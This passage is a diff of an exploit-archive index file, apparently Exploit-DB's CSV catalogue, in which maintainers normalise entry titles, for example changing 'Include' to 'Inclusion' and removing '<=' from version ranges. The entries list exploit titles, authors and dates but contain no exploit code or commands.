Disclosure",2013-11-17,"Yashar shahinzadeh",php,webapps,0 38829,platforms/windows/remote/38829.py,"Easy File Sharing Web Server 7.2 - Remote SEH Buffer Overflow (DEP Bypass with ROP)",2015-11-30,Knaps,windows,remote,0 @@ -35101,13 +35101,13 @@ id,file,description,date,author,platform,type,port 38840,platforms/hardware/webapps/38840.txt,"Belkin N150 Wireless Home Router F9K1009 v1 - Multiple Vulnerabilities",2015-12-01,"Rahul Pratap Singh",hardware,webapps,80 38841,platforms/php/webapps/38841.txt,"Zenphoto 1.4.10 - Local File Inclusion",2015-12-01,hyp3rlinx,php,webapps,80 38842,platforms/php/webapps/38842.txt,"Testa OTMS Multiple SQL Injection Vulnerabilities",2013-11-13,"Ashiyane Digital Security Team",php,webapps,0 -38843,platforms/php/webapps/38843.txt,"TomatoCart 'install/rpc.php' Local File Include",2013-11-18,Esac,php,webapps,0 +38843,platforms/php/webapps/38843.txt,"TomatoCart 'install/rpc.php' Local File Inclusion",2013-11-18,Esac,php,webapps,0 38835,platforms/multiple/local/38835.py,"Centos 7.1/Fedora 22 - abrt Local Root",2015-12-01,rebel,multiple,local,0 -38836,platforms/multiple/webapps/38836.txt,"ntop-ng <= 2.0.151021 - Privilege Escalation",2015-12-01,"Dolev Farhi",multiple,webapps,0 +38836,platforms/multiple/webapps/38836.txt,"ntop-ng 2.0.151021 - Privilege Escalation",2015-12-01,"Dolev Farhi",multiple,webapps,0 38837,platforms/php/webapps/38837.txt,"IP.Board 4.1.4.x - Persistent XSS",2015-12-01,"Mehdi Alouache",php,webapps,0 38844,platforms/php/webapps/38844.html,"WordPress Blue Wrench Video Widget Plugin Cross Site Request Forgery",2013-11-23,"Haider Mahmood",php,webapps,0 38845,platforms/multiple/remote/38845.txt,"SKIDATA Freemotion.Gate Unauthenticated Web Services Multiple Command Execution Vulnerabilities",2013-11-19,"Dennis Kelly",multiple,remote,0 -38846,platforms/multiple/remote/38846.txt,"nginx <= 1.1.17 URI Processing Security Bypass",2013-11-19,"Ivan Fratric",multiple,remote,0 +38846,platforms/multiple/remote/38846.txt,"nginx 1.1.17 URI Processing Security Bypass",2013-11-19,"Ivan Fratric",multiple,remote,0 38847,platforms/windows/local/38847.py,"Acunetix WVS 10 - Local Privilege Escalation",2015-12-02,"Daniele Linguaglossa",windows,local,0 38848,platforms/php/webapps/38848.php,"WordPress Suco Themes 'themify-ajax.php' Arbitrary File Upload",2013-11-20,DevilScreaM,php,webapps,0 38849,platforms/cgi/remote/38849.rb,"Advantech Switch - Bash Environment Variable Code Injection (Shellshock)",2015-12-02,Metasploit,cgi,remote,0 @@ -35132,7 +35132,7 @@ id,file,description,date,author,platform,type,port 38868,platforms/php/webapps/38868.txt,"WordPress Plugin Sell Download 1.0.16 - Local File Disclosure",2015-12-04,KedAns-Dz,php,webapps,0 38869,platforms/php/webapps/38869.txt,"WordPress Plugin TheCartPress 1.4.7 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0 38870,platforms/php/webapps/38870.txt,"WordPress Easy Career Openings Plugin 'jobid' Parameter SQL Injection",2013-12-06,Iranian_Dark_Coders_Team,php,webapps,0 -38871,platforms/windows/local/38871.txt,"Cyclope Employee Surveillance <= 8.6.1- Insecure File Permissions",2015-12-06,loneferret,windows,local,0 +38871,platforms/windows/local/38871.txt,"Cyclope Employee Surveillance 8.6.1- Insecure File Permissions",2015-12-06,loneferret,windows,local,0 38872,platforms/php/webapps/38872.php,"WordPress PhotoSmash Galleries Plugin 'bwbps-uploader.php' Arbitrary File Upload",2013-12-08,"Ashiyane Digital Security Team",php,webapps,0 38873,platforms/php/webapps/38873.txt,"eduTrac 'showmask' Parameter Directory Traversal",2013-12-11,"High-Tech Bridge",php,webapps,0 38874,platforms/php/webapps/38874.txt,"BoastMachine 'blog' Parameter SQL Injection Vulnerablity",2013-12-13,"Omar Kurt",php,webapps,0 @@ -35195,7 +35195,7 @@ id,file,description,date,author,platform,type,port 38935,platforms/asp/webapps/38935.txt,"CMS Afroditi 'id' Parameter SQL Injection Vulnerablity",2013-12-30,"projectzero labs",asp,webapps,0 38936,platforms/php/webapps/38936.txt,"Advanced Dewplayer Plugin for WordPress 'download-file.php' Script Directory Traversal",2013-12-30,"Henri Salo",php,webapps,0 38937,platforms/linux/local/38937.txt,"Apache Libcloud Digital Ocean API Local Information Disclosure",2014-01-01,anonymous,linux,local,0 -38938,platforms/php/webapps/38938.txt,"xBoard 'post' Parameter Local File Include",2013-12-24,"TUNISIAN CYBER",php,webapps,0 +38938,platforms/php/webapps/38938.txt,"xBoard 'post' Parameter Local File Inclusion",2013-12-24,"TUNISIAN CYBER",php,webapps,0 38939,platforms/multiple/dos/38939.c,"VLC Media Player 1.1.11 - '.NSV' File Denial of Service",2012-03-14,"Dan Fosco",multiple,dos,0 38940,platforms/multiple/dos/38940.c,"VLC Media Player 1.1.11 - '.EAC3' File Denial of Service",2012-03-14,"Dan Fosco",multiple,dos,0 38941,platforms/php/webapps/38941.txt,"GoAutoDial CE 3.3 - Multiple Vulnerabilities",2015-12-12,R-73eN,php,webapps,0 @@ -35294,7 +35294,7 @@ id,file,description,date,author,platform,type,port 39035,platforms/win_x86-64/local/39035.txt,"Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010)",2015-12-18,"Jean-Jamil Khalife",win_x86-64,local,0 39099,platforms/php/webapps/39099.txt,"Rhino Cross Site Scripting and Password Reset Security Bypass Vulnerabilities",2014-02-12,Slotleet,php,webapps,0 39037,platforms/windows/dos/39037.php,"Apache 2.4.17 - Denial of Service",2015-12-18,rUnViRuS,windows,dos,0 -39038,platforms/php/webapps/39038.txt,"PFSense <= 2.2.5 - Directory Traversal",2015-12-18,R-73eN,php,webapps,0 +39038,platforms/php/webapps/39038.txt,"PFSense 2.2.5 - Directory Traversal",2015-12-18,R-73eN,php,webapps,0 39039,platforms/multiple/dos/39039.txt,"Google Chrome - Renderer Process to Browser Process Privilege Escalation",2015-12-18,"Google Security Research",multiple,dos,0 39040,platforms/windows/dos/39040.txt,"Adobe Flash MovieClip.attachBitmap - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0 39041,platforms/windows/dos/39041.txt,"Adobe Flash MovieClip.startDrag - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0 @@ -35342,17 +35342,17 @@ id,file,description,date,author,platform,type,port 39084,platforms/php/webapps/39084.txt,"Grawlix 1.0.3 - CSRF",2015-12-23,"Curesec Research Team",php,webapps,80 39085,platforms/php/webapps/39085.txt,"Arastta 1.1.5 - SQL Injection Vulnerabilities",2015-12-23,"Curesec Research Team",php,webapps,80 39086,platforms/php/webapps/39086.txt,"PhpSocial 2.0.0304_20222226 - CSRF",2015-12-23,"Curesec Research Team",php,webapps,80 -39087,platforms/php/webapps/39087.txt,"Singapore 0.9.9 b beta Image Gallery Remote File Include And Cross Site Scripting Vulnerabilities",2014-02-05,"TUNISIAN CYBER",php,webapps,0 +39087,platforms/php/webapps/39087.txt,"Singapore 0.9.9 b beta Image Gallery Remote File Inclusion And Cross Site Scripting Vulnerabilities",2014-02-05,"TUNISIAN CYBER",php,webapps,0 39088,platforms/php/webapps/39088.txt,"Joomla! Projoom NovaSFH Plugin 'upload.php' Arbitrary File Upload",2013-12-13,"Yuri Kramarz",php,webapps,0 39089,platforms/hardware/remote/39089.txt,"NETGEAR D6300B /diag.cgi IPAddr4 Parameter Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0 39090,platforms/php/webapps/39090.php,"WordPress Kiddo Theme Arbitrary File Upload",2014-02-05,"TUNISIAN CYBER",php,webapps,0 39091,platforms/php/dos/39091.pl,"WHMCS 5.12 - 'cart.php' Denial of Service",2014-02-07,Amir,php,dos,0 -39092,platforms/php/dos/39092.pl,"phpBB <= 3.0.8 - Remote Denial of Service",2014-02-11,Amir,php,dos,0 +39092,platforms/php/dos/39092.pl,"phpBB 3.0.8 - Remote Denial of Service",2014-02-11,Amir,php,dos,0 39093,platforms/php/webapps/39093.txt,"Beezfud - Remote Code Execution",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80 39094,platforms/php/webapps/39094.txt,"Rips Scanner 0.5 - (code.php) Local File Inclusion",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80 39100,platforms/php/webapps/39100.txt,"WordPress NextGEN Gallery Plugin 'jqueryFileTree.php' Directory Traversal",2014-02-19,"Tom Adams",php,webapps,0 39101,platforms/php/webapps/39101.php,"MODx Evogallery Module 'uploadify.php' Arbitrary File Upload",2014-02-18,"TUNISIAN CYBER",php,webapps,0 -39102,platforms/windows/local/39102.py,"EasyCafe Server <= 2.2.14 - Remote File Read",2015-12-26,R-73eN,windows,local,0 +39102,platforms/windows/local/39102.py,"EasyCafe Server 2.2.14 - Remote File Read",2015-12-26,R-73eN,windows,local,0 39103,platforms/windows/dos/39103.txt,"AccessDiver 4.301 - Buffer Overflow",2015-12-26,hyp3rlinx,windows,dos,0 39106,platforms/asp/webapps/39106.txt,"eshtery CMS 'FileManager.aspx' Local File Disclosure",2014-02-22,peng.deng,asp,webapps,0 39107,platforms/php/webapps/39107.txt,"ATutor Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2014-02-22,HauntIT,php,webapps,0 @@ -35362,28 +35362,28 @@ id,file,description,date,author,platform,type,port 39111,platforms/php/webapps/39111.php,"WordPress Premium Gallery Manager Plugin Arbitrary File Upload",2014-03-06,eX-Sh1Ne,php,webapps,0 39112,platforms/linux/local/39112.txt,"QNX Phgrafx File Enumeration Weakness",2014-03-10,cenobyte,linux,local,0 39113,platforms/php/webapps/39113.txt,"Professional Designer E-Store 'id' Parameter Multiple SQL Injection Vulnerabilities",2014-03-08,"Nawaf Alkeraithe",php,webapps,0 -39114,platforms/ios/remote/39114.txt,"Apple iOS <= 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",ios,remote,0 +39114,platforms/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",ios,remote,0 39115,platforms/multiple/remote/39115.py,"ET - Chat Password Reset Security Bypass",2014-03-09,IRH,multiple,remote,0 39116,platforms/php/webapps/39116.txt,"GNUboard 4.3x 'ajax.autosave.php' Multiple SQL Injection Vulnerabilities",2014-03-19,"Claepo Wang",php,webapps,0 39117,platforms/php/webapps/39117.txt,"OpenX 2.8.x Multiple Cross Site Request Forgery Vulnerabilities",2014-03-15,"Mahmoud Ghorbanzadeh",php,webapps,0 39118,platforms/php/webapps/39118.html,"osCmax 2.5 Cross Site Request Forgery",2014-03-17,"TUNISIAN CYBER",php,webapps,0 -39119,platforms/windows/remote/39119.py,"KiTTY Portable <= 0.65.0.2p - Chat Remote Buffer Overflow (SEH Windows XP/7/10)",2015-12-29,"Guillaume Kaddouch",windows,remote,0 -39120,platforms/windows/local/39120.py,"KiTTY Portable <= 0.65.1.1p Local Saved Session Overflow (Egghunter XP_ DoS 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0 -39121,platforms/windows/local/39121.py,"KiTTY Portable <= 0.65.0.2p - Local kitty.ini Overflow (Wow64 Egghunter Windows 7)",2015-12-29,"Guillaume Kaddouch",windows,local,0 -39122,platforms/windows/local/39122.py,"KiTTY Portable <= 0.65.0.2p - Local kitty.ini Overflow (Windows 8.1/Windows 10)",2015-12-29,"Guillaume Kaddouch",windows,local,0 -39124,platforms/php/webapps/39124.txt,"MeiuPic 'ctl' Parameter Local File Include",2014-03-10,Dr.3v1l,php,webapps,0 +39119,platforms/windows/remote/39119.py,"KiTTY Portable 0.65.0.2p - Chat Remote Buffer Overflow (SEH Windows XP/7/10)",2015-12-29,"Guillaume Kaddouch",windows,remote,0 +39120,platforms/windows/local/39120.py,"KiTTY Portable 0.65.1.1p Local Saved Session Overflow (Egghunter XP_ DoS 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0 +39121,platforms/windows/local/39121.py,"KiTTY Portable 0.65.0.2p - Local kitty.ini Overflow (Wow64 Egghunter Windows 7)",2015-12-29,"Guillaume Kaddouch",windows,local,0 +39122,platforms/windows/local/39122.py,"KiTTY Portable 0.65.0.2p - Local kitty.ini Overflow (Windows 8.1/Windows 10)",2015-12-29,"Guillaume Kaddouch",windows,local,0 +39124,platforms/php/webapps/39124.txt,"MeiuPic 'ctl' Parameter Local File Inclusion",2014-03-10,Dr.3v1l,php,webapps,0 39125,platforms/windows/dos/39125.html,"Kaspersky Internet Security Remote Denial of Service",2014-03-20,CXsecurity,windows,dos,0 39126,platforms/php/webapps/39126.txt,"BIGACE Web CMS 2.7.5 - /public/index.php LANGUAGE Parameter Remote Path Traversal File Access",2014-03-19,"Hossein Hezami",php,webapps,0 39127,platforms/cgi/webapps/39127.txt,"innoEDIT 'innoedit.cgi' Remote Command Execution",2014-03-21,"Felipe Andrian Peixoto",cgi,webapps,0 39128,platforms/php/webapps/39128.txt,"Jorjweb 'id' Parameter SQL Injection",2014-02-21,"Vulnerability Laboratory",php,webapps,0 -39129,platforms/php/webapps/39129.txt,"qEngine 'run' Parameter Local File Include",2014-03-25,"Gjoko Krstic",php,webapps,0 +39129,platforms/php/webapps/39129.txt,"qEngine 'run' Parameter Local File Inclusion",2014-03-25,"Gjoko Krstic",php,webapps,0 39130,platforms/cgi/webapps/39130.txt,"DotItYourself 'dot-it-yourself.cgi' Remote Command Execution",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps,0 39131,platforms/cgi/webapps/39131.txt,"Beheer Systeem 'pbs.cgi' Remote Command Execution",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps,0 39132,platforms/windows/local/39132.py,"FTPShell Client 5.24 - Buffer Overflow",2015-12-30,hyp3rlinx,windows,local,0 39133,platforms/php/webapps/39133.php,"Simple Ads Manager 2.9.4.116 - SQL Injection",2015-12-30,"Kacper Szurek",php,webapps,80 39134,platforms/linux/local/39134.txt,"DeleGate 9.9.13 - Local Root",2015-12-30,"Larry W. Cashdollar",linux,local,0 39135,platforms/php/webapps/39135.php,"WordPress Felici Theme 'uploadify.php' Arbitrary File Upload",2014-03-23,"CaFc Versace",php,webapps,0 -39136,platforms/php/webapps/39136.txt,"Symphony <= 2.2.4 Cross Site Request Forgery",2014-03-24,"High-Tech Bridge",php,webapps,0 +39136,platforms/php/webapps/39136.txt,"Symphony 2.2.4 Cross Site Request Forgery",2014-03-24,"High-Tech Bridge",php,webapps,0 39137,platforms/cgi/webapps/39137.txt,"Primo Interactive CMS 'pcm.cgi' Remote Command Execution",2014-03-31,"Felipe Andrian Peixoto",cgi,webapps,0 39138,platforms/hardware/remote/39138.html,"ICOMM 610 Wireless Modem Cross Site Request Forgery",2014-04-12,"Blessen Thomas",hardware,remote,0 39139,platforms/php/webapps/39139.txt,"PHPFox Access Control Security Bypass",2014-04-05,"Wesley Henrique",php,webapps,0 @@ -35415,7 +35415,7 @@ id,file,description,date,author,platform,type,port 39163,platforms/multiple/dos/39163.txt,"pdfium CPDF_TextObject::CalcPositionData - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0 39164,platforms/multiple/dos/39164.txt,"pdfium IsFlagSet (v8 memory management) - SIGSEGV",2016-01-04,"Google Security Research",multiple,dos,0 39165,platforms/multiple/dos/39165.txt,"pdfium CPDF_Function::Call - Stack-Based Buffer Overflow",2016-01-04,"Google Security Research",multiple,dos,0 -39166,platforms/linux/local/39166.c,"Linux Kernel <= 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Root Exploit (1)",2016-01-05,rebel,linux,local,0 +39166,platforms/linux/local/39166.c,"Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Root Exploit (1)",2016-01-05,rebel,linux,local,0 39167,platforms/php/webapps/39167.txt,"Online Airline Booking System - Multiple Vulnerabilities",2016-01-05,"Manish Tanwar",php,webapps,80 39168,platforms/php/webapps/39168.txt,"Simple PHP Polling System - Multiple Vulnerabilities",2016-01-05,WICS,php,webapps,80 39169,platforms/multiple/dos/39169.pl,"Ganeti - Multiple Vulnerabilities",2016-01-05,"Pierre Kim",multiple,dos,0 @@ -35463,10 +35463,10 @@ id,file,description,date,author,platform,type,port 39211,platforms/php/webapps/39211.txt,"WordPress Infocus Theme '/infocus/lib/scripts/dl-skin.php' Local File Disclosure",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0 39212,platforms/php/webapps/39212.txt,"WordPress JW Player for Flash & HTML5 Video Plugin Cross Site Request Forgery",2014-06-10,"Tom Adams",php,webapps,0 39213,platforms/php/webapps/39213.txt,"WordPress Featured Comments Plugin Cross Site Request Forgery",2014-06-10,"Tom Adams",php,webapps,0 -39214,platforms/linux/local/39214.c,"Linux Kernel <= 3.3.5 - '/drivers/media/media-device.c' Local Information Disclosure",2014-05-28,"Salva Peiro",linux,local,0 +39214,platforms/linux/local/39214.c,"Linux Kernel 3.3.5 - '/drivers/media/media-device.c' Local Information Disclosure",2014-05-28,"Salva Peiro",linux,local,0 39215,platforms/windows/remote/39215.py,"Konica Minolta FTP Utility 1.00 - CWD Command SEH Overflow",2016-01-11,TOMIWA,windows,remote,21 39216,platforms/windows/dos/39216.py,"KeePass Password Safe Classic 1.29 - Crash PoC",2016-01-11,"Mohammad Reza Espargham",windows,dos,0 -39217,platforms/linux/local/39217.c,"Amanda <= 3.3.1 - Local Root Exploit",2016-01-11,"Hacker Fantastic",linux,local,0 +39217,platforms/linux/local/39217.c,"Amanda 3.3.1 - Local Root Exploit",2016-01-11,"Hacker Fantastic",linux,local,0 39218,platforms/windows/remote/39218.html,"TrendMicro node.js HTTP Server Listening on localhost Can Execute Commands",2016-01-11,"Google Security Research",windows,remote,0 39219,platforms/multiple/dos/39219.txt,"Adobe Flash BlurFilter Processing - Out-of-Bounds Memset",2016-01-11,"Google Security Research",multiple,dos,0 39220,platforms/windows/dos/39220.txt,"Adobe Flash - Use-After-Free When Rendering Displays From Multiple Scripts (1)",2016-01-11,"Google Security Research",windows,dos,0 @@ -35475,25 +35475,25 @@ id,file,description,date,author,platform,type,port 39223,platforms/php/webapps/39223.txt,"ZeusCart 'prodid' Parameter SQL Injection",2014-06-24,"Kenny Mathis",php,webapps,0 39224,platforms/hardware/remote/39224.py,"FortiGate OS Version 4.x < 5.0.7 - SSH Backdoor",2016-01-12,operator8203,hardware,remote,22 39229,platforms/linux/dos/39229.cpp,"Grassroots DICOM (GDCM) 2.6.0 and 2.6.1 - ImageRegionReader::ReadIntoBuffer Buffer Overflow",2016-01-12,"Stelios Tsampas",linux,dos,0 -39230,platforms/linux/local/39230.c,"Linux Kernel <= 4.3.3 - 'overlayfs' Local Privilege Escalation (2)",2016-01-12,halfdog,linux,local,0 +39230,platforms/linux/local/39230.c,"Linux Kernel 4.3.3 - 'overlayfs' Local Privilege Escalation (2)",2016-01-12,halfdog,linux,local,0 39231,platforms/asp/webapps/39231.py,"WhatsUp Gold 16.3 - Unauthenticated Remote Code Execution",2016-01-13,"Matt Buzanowski",asp,webapps,0 39232,platforms/windows/dos/39232.txt,"Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007)",2016-01-13,"Google Security Research",windows,dos,0 39233,platforms/windows/dos/39233.txt,"Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007)",2016-01-13,"Google Security Research",windows,dos,0 -39234,platforms/php/webapps/39234.py,"SevOne NMS <= 5.3.6.0 - Remote Root Exploit",2016-01-14,@iamsecurity,php,webapps,80 +39234,platforms/php/webapps/39234.py,"SevOne NMS 5.3.6.0 - Remote Root Exploit",2016-01-14,@iamsecurity,php,webapps,80 39235,platforms/multiple/webapps/39235.txt,"Manage Engine Applications Manager 12 - Multiple Vulnerabilities",2016-01-14,"Bikramaditya Guha",multiple,webapps,9090 39236,platforms/multiple/webapps/39236.py,"Manage Engine Application Manager 12.5 - Arbitrary Command Execution",2016-01-14,"Bikramaditya Guha",multiple,webapps,0 -39237,platforms/php/webapps/39237.txt,"WordPress NextGEN Gallery <= 1.9.1 - 'photocrati_ajax' Arbitrary File Upload",2014-05-19,SANTHO,php,webapps,0 +39237,platforms/php/webapps/39237.txt,"WordPress NextGEN Gallery 1.9.1 - 'photocrati_ajax' Arbitrary File Upload",2014-05-19,SANTHO,php,webapps,0 39238,platforms/php/webapps/39238.txt,"AtomCMS SQL Injection and Arbitrary File Upload Vulnerabilities",2014-07-07,"Jagriti Sahu",php,webapps,0 39239,platforms/php/webapps/39239.txt,"xClassified 'ads.php' SQL Injection",2014-07-07,Lazmania61,php,webapps,0 39240,platforms/php/webapps/39240.txt,"WordPress BSK PDF Manager Plugin - 'wp-admin/admin.php' Multiple SQL Injection Vulnerabilities",2014-07-09,"Claudio Viviani",php,webapps,0 39241,platforms/java/webapps/39241.py,"Glassfish Server - Arbitrary File Read",2016-01-15,bingbing,java,webapps,4848 39242,platforms/windows/dos/39242.py,"NetSchedScan 1.0 - Crash PoC",2016-01-15,"Abraham Espinosa",windows,dos,0 -39243,platforms/php/webapps/39243.txt,"phpDolphin <= 2.0.5 - Multiple Vulnerabilities",2016-01-15,WhiteCollarGroup,php,webapps,80 -39244,platforms/linux/local/39244.txt,"Amanda <= 3.3.1 - amstar Command Injection Local Root",2016-01-15,"Hacker Fantastic",linux,local,0 +39243,platforms/php/webapps/39243.txt,"phpDolphin 2.0.5 - Multiple Vulnerabilities",2016-01-15,WhiteCollarGroup,php,webapps,80 +39244,platforms/linux/local/39244.txt,"Amanda 3.3.1 - amstar Command Injection Local Root",2016-01-15,"Hacker Fantastic",linux,local,0 39245,platforms/php/webapps/39245.txt,"Roundcube 1.1.3 - Path Traversal",2016-01-15,"High-Tech Bridge SA",php,webapps,80 39246,platforms/php/webapps/39246.txt,"mcart.xls Bitrix Module 6.5.2 - SQL Injection",2016-01-15,"High-Tech Bridge SA",php,webapps,80 39250,platforms/php/webapps/39250.txt,"WordPress DZS-VideoGallery Plugin Cross Site Scripting and Command Injection Vulnerabilities",2014-07-13,MustLive,php,webapps,0 -39251,platforms/php/webapps/39251.txt,"WordPress BookX Plugin 'includes/bookx_export.php' Local File Include",2014-05-28,"Anant Shrivastava",php,webapps,0 +39251,platforms/php/webapps/39251.txt,"WordPress BookX Plugin 'includes/bookx_export.php' Local File Inclusion",2014-05-28,"Anant Shrivastava",php,webapps,0 39252,platforms/php/webapps/39252.txt,"WordPress WP Rss Poster Plugin 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 39253,platforms/php/webapps/39253.txt,"WordPress ENL Newsletter Plugin 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 39254,platforms/php/webapps/39254.html,"WordPress CopySafe PDF Protection Plugin Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0 @@ -35519,12 +35519,12 @@ id,file,description,date,author,platform,type,port 39273,platforms/php/webapps/39273.txt,"CMSimple /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0 39274,platforms/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21 39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0 -39277,platforms/linux/local/39277.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (1)",2016-01-19,"Perception Point Team",linux,local,0 -40003,platforms/linux/local/40003.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2)",2016-01-19,"Federico Bento",linux,local,0 +39277,platforms/linux/local/39277.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (1)",2016-01-19,"Perception Point Team",linux,local,0 +40003,platforms/linux/local/40003.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2)",2016-01-19,"Federico Bento",linux,local,0 39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall Authentication Bypass",2014-08-04,"Nick Hayes",hardware,remote,0 39279,platforms/php/webapps/39279.txt,"WordPress wpSS Plugin 'ss_handler.php' SQL Injection",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0 39280,platforms/php/webapps/39280.txt,"WordPress HDW Player Plugin 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 -39281,platforms/php/webapps/39281.txt,"VoipSwitch 'action' Parameter Local File Include",2014-08-08,0x4148,php,webapps,0 +39281,platforms/php/webapps/39281.txt,"VoipSwitch 'action' Parameter Local File Inclusion",2014-08-08,0x4148,php,webapps,0 39282,platforms/php/webapps/39282.txt,"WordPress GB Gallery Slideshow Plugin 'wp-admin/admin-ajax.php' SQL Injection",2014-08-11,"Claudio Viviani",php,webapps,0 39283,platforms/php/webapps/39283.txt,"WordPress FB Gorilla Plugin 'game_play.php' SQL Injection",2014-07-28,Amirh03in,php,webapps,0 39284,platforms/windows/local/39284.txt,"Oracle HtmlConverter.exe - Buffer Overflow",2016-01-21,hyp3rlinx,windows,local,0 @@ -35533,14 +35533,14 @@ id,file,description,date,author,platform,type,port 39288,platforms/multiple/webapps/39288.txt,"ManageEngine Password Manager Pro and ManageEngine IT360 SQL Injection",2014-08-20,"Pedro Ribeiro",multiple,webapps,0 39289,platforms/php/webapps/39289.txt,"ArticleFR 'id' Parameter SQL Injection",2014-08-20,"High-Tech Bridge",php,webapps,0 39290,platforms/php/webapps/39290.txt,"MyAwards MyBB Module Cross Site Request Forgery",2014-08-22,Vagineer,php,webapps,0 -39291,platforms/php/webapps/39291.txt,"WordPress KenBurner Slider Plugin 'admin-ajax.php' Arbitrary File Download Vulnerabilitiy",2014-08-24,MF0x,php,webapps,0 +39291,platforms/php/webapps/39291.txt,"WordPress KenBurner Slider Plugin 'admin-ajax.php' - Arbitrary File Download",2014-08-24,MF0x,php,webapps,0 39292,platforms/multiple/remote/39292.pl,"Granding MA300 Traffic Sniffing MitM Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",multiple,remote,0 39293,platforms/multiple/remote/39293.pl,"Granding MA300 Weak Pin Encryption Brute-force Weakness",2014-08-26,"Eric Sesterhenn",multiple,remote,0 39294,platforms/php/webapps/39294.txt,"Joomla! Spider Video Player Extension 'theme' Parameter SQL Injection",2014-08-26,"Claudio Viviani",php,webapps,0 -39295,platforms/multiple/remote/39295.js,"Mozilla Firefox <= 9.0.1 and Thunderbird <= 3.1.20 Information Disclosure",2014-09-02,"Michal Zalewski",multiple,remote,0 -39296,platforms/php/webapps/39296.txt,"WordPress Urban City Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 -39297,platforms/php/webapps/39297.txt,"WordPress Authentic Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 -39298,platforms/php/webapps/39298.txt,"WordPress Epic Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 +39295,platforms/multiple/remote/39295.js,"Mozilla Firefox 9.0.1 and Thunderbird 3.1.20 Information Disclosure",2014-09-02,"Michal Zalewski",multiple,remote,0 +39296,platforms/php/webapps/39296.txt,"WordPress Urban City Theme 'download.php' - Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 +39297,platforms/php/webapps/39297.txt,"WordPress Authentic Theme 'download.php' - Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 +39298,platforms/php/webapps/39298.txt,"WordPress Epic Theme 'download.php' - Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 39299,platforms/php/webapps/39299.txt,"WordPress Antioch Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 39300,platforms/php/webapps/39300.txt,"WordPress Spider Facebook Plugin 'facebook.php' SQL Injection",2014-09-07,"Claudio Viviani",php,webapps,0 39301,platforms/php/webapps/39301.html,"WordPress Ninja Forms Plugin Authorization Bypass",2014-09-08,Voxel@Night,php,webapps,0 @@ -35548,10 +35548,10 @@ id,file,description,date,author,platform,type,port 39303,platforms/php/webapps/39303.txt,"WordPress Xhanch My Twitter Plugin Cross Site Request Forgery",2014-09-08,Voxel@Night,php,webapps,0 39304,platforms/php/webapps/39304.txt,"WordPress W3 Total Cache Plugin 'admin.php' Cross Site Request Forgery",2014-09-08,Voxel@Night,php,webapps,0 39305,platforms/freebsd/dos/39305.py,"FreeBSD SCTP ICMPv6 Error Processing",2016-01-25,ptsecurity,freebsd,dos,0 -39306,platforms/php/webapps/39306.html,"pfSense Firewall <= 2.2.5 - Config File CSRF",2016-01-25,"Aatif Shahdad",php,webapps,443 +39306,platforms/php/webapps/39306.html,"pfSense Firewall 2.2.5 - Config File CSRF",2016-01-25,"Aatif Shahdad",php,webapps,443 39375,platforms/osx/dos/39375.c,"OS X Kernel - IOAccelDisplayPipeUserClient2 Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 -39308,platforms/linux/dos/39308.c,"Linux Kernel <= 3.x / <= 4.x - prima WLAN Driver Heap Overflow",2016-01-25,"Shawn the R0ck",linux,dos,0 -39309,platforms/php/webapps/39309.txt,"WordPress Booking Calendar Contact Form Plugin <= 1.1.23 - Unauthenticated SQL injection",2016-01-25,"i0akiN SEC-LABORATORY",php,webapps,80 +39308,platforms/linux/dos/39308.c,"Linux Kernel 3.x / 4.x - prima WLAN Driver Heap Overflow",2016-01-25,"Shawn the R0ck",linux,dos,0 